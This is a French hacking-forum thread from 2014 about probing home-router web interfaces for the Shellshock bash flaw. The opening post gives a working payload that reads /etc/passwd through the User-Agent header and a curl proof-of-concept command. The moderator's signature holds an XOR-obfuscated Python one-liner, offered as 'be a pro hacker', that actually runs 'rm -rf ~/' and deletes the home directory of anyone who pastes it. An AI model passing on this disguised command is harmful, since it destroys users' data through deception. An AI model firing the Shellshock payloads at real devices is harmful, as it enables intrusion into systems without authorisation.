Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-09-2014 14:29:53

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

shellshock et routeurs locaux

Bonjour.

Vous avez sûrement entendu parler de shellshock, la faille de bash qui permet l'éxécution de code caché dans une variable d'environnement. Celle-ci est terrible dans le cas des services web utilisant CGI (Common Gateway Interface, un protocole d'interface entre le serveur web et des éxécutables pour préparer le contenu dynamique) et bash.

En effet, beaucoup (notamment le setup standard apache il me semble) utilisent les variables d'environnement pour fournir aux subprocess les headers HTTP. Or, si vous mettez  «User-Agent: () { :; }; /bin/cat /etc/passwd», le process bash utilisé pour lancer l'éxécutable (login.pl, whatever.cgi) éxécutera votre code.

Cela permet d'écrire tout au début de la réponse HTTP quand on met des echo ou un cat dans notre example.

Il me semble qu'en tant que principale plateforme de recherche et d'échanges sur la sécurité du Wi-Fi, nous devrions établir une liste des routeurs maison dont l'interface est vulnérable.

Pour ça, il faut bash et un cgi. Il n'est pas obligatoire qu'il y ait '/cgi-bin/' dans les path d'url, mais c'est plus courant car plus simple à réaliser, côté constructeur.

On fait une liste et on check ? Je n'ai pas de code de poc ici (à par ça : )

curl -A "() { :; }; echo 'Content-Type: text/plain'; echo; echo; echo vulnerable " http://192.168.0.1/poc.cgi

Je vous laisse tenter de trigger différentes url. si vous ne voyez pas 'vulnerable' au tout début de la réponse, vous pouvez tenter de virer les echo et de mettre un ping vers vous, à vous de l'intercepter avec tcpdump.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-09-2014 17:45:18

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : shellshock et routeurs locaux

Ce serait intéressant d'avoir plutôt des retours sur les modèles utilisés par les ISP français, mais bon, de mon côté j'ai testé sur un routeur distribué en Espagne par la compagnie Telefonica.


Fabricant :                 Comtrend
Modèle:                     WAP-5813n
eSSID:                      WLAN_XXXX ( où les X sont majuscules hexadécimale)
bSSID:                      00:1A:2B:XX:XX:XX
Board ID:                   96369R-1231N
Software Version:       P401-402TLF-C02_R35

Pas de brèche detectée à ce niveau avec le code poc du premier post.
Je continue à chercher, plusieurs services sont activés avec la configuration par défaut :   

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
23/tcp open  telnet
80/tcp open  http

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
185 185861 10-07-2016 19:35:20 par Seska
20 8193 16-09-2014 20:22:37 par M1ck3y
4 854 20-06-2014 14:56:53 par kcdtv
16 8619 15-06-2014 07:34:48 par kcdtv
7 1665 15-10-2013 16:36:13 par Benzilla

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.036 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]